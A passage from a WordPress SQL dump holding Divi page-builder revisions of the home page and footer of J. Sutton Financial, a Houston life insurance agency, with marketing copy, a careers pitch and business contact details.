title_text=\"j sutton logo white no background\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|188px||188px||true\" width=\"46.1%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on|||#f9f9f9|dotted\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#FFFFFF\" background_layout=\"dark\" sticky_enabled=\"0\" link_text_color=\"#f9f9f9\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"||66px|||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:44:55','2023-04-02 17:44:55','',138,'http://cmdev-site1.com/?p=573',0,'revision','',0),(572,1,'2023-04-02 17:44:41','2023-04-02 17:44:41','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" dropdown_menu_line_color=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" dropdown_menu_active_link_color=\"#003372\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" header_text_align=\"center\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" hover_enabled=\"0\" global_colors_info=\"{}\" text_orientation=\"center\" sticky_enabled=\"0\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" _dynamic_attributes=\"button_one_url\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"80%\" custom_margin=\"|37px||||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" global_colors_info=\"{}\" custom_padding=\"66px||66px|||\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"-11px|||||\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" sticky_enabled=\"0\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" height=\"148px\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"j sutton logo white no background\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|188px||188px||true\" width=\"46.1%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on|||#f9f9f9|dotted\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#FFFFFF\" background_layout=\"dark\" sticky_enabled=\"0\" link_text_color=\"#f9f9f9\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"||66px|||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:44:41','2023-04-02 17:44:41','',138,'http://cmdev-site1.com/?p=572',0,'revision','',0),(575,1,'2023-04-02 17:45:59','2023-04-02 17:45:59','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"|||0px||\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:45:59','2023-04-02 17:45:59','',138,'http://cmdev-site1.com/?p=575',0,'revision','',0),(581,1,'2023-04-02 17:54:36','2023-04-02 17:54:36','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"||66px|||\" min_height=\"24.8px\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','UPDATED-FOOTER','','publish','closed','closed','','updated-footer-2','','','2023-04-02 17:54:36','2023-04-02 17:54:36','',0,'http://cmdev-site1.com/et_pb_layout/updated-footer-2/',0,'et_pb_layout','',0),(577,1,'2023-04-02 17:49:05','2023-04-02 17:49:05','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjEzOCJ9fQ==@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" 